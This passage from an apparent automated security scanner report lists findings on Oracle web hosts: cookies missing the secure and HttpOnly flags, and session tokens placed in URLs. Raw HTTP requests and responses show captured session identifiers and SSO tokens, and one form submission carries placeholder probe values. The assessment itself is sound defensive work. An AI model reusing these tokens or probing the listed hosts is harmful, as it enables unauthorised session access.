Set-Cookie: GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML
Connection: Close
Content-Length: 741
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore
...[SNIP]...

4.36. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCZzpHome.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: ibeCsZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML
Connection: Close
Content-Length: 315
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=3540882061.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM
...[SNIP]...

5. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


5.1. https://campus.oracle.com/campus/HR/global_home.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/global_home.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /campus/HR/global_home.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:32 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 14816
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<img src="images/icon_arrow_sm.gif" /> <a href="http://forums.oracle.com/forums/main.jspa;jsessionid=8d92079f30d636352b150f9b46e6a13795c2b391cd79.e3mSaNmQc3j0ax4NchmOahqSb40?categoryID=84" target="_blank" style="color:#000000; text-decoration:underline">Oracle Discussion Forums</a>
...[SNIP]...

5.2. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/APEX_040100.wwv_flow_image_generator.get_image

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_cc=true; s_nr=1318815511138; gpw_e24=no%20value; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Location: http://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
Server: BigIP
Content-Length: 0
Date: Mon, 17 Oct 2011 01:38:08 GMT
Connection: keep-alive


5.3. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<div class="confirmBox">
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
</div>
...[SNIP]...

5.4. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<div class="confirmBox">
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
</div>
...[SNIP]...

5.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:38 GMT
X-ORACLE-DMS-ECID: 0000JCHgdlx6MQK6EVaAUS1EaweP001nsI
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Content-Length: 3313

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 43 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/emea-apply%20now.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/emea-apply%20now.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_current-openings.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 15370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

6.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/emea1-jobs-remove1.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 366566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<style type="text/css">
<!--
a:hover {text-decoration: un
...[SNIP]...

6.3. https://campus.oracle.com/campus/HR/us-calendar.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-calendar.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-calendar.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 167256

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

6.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:38:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

6.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-direct.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
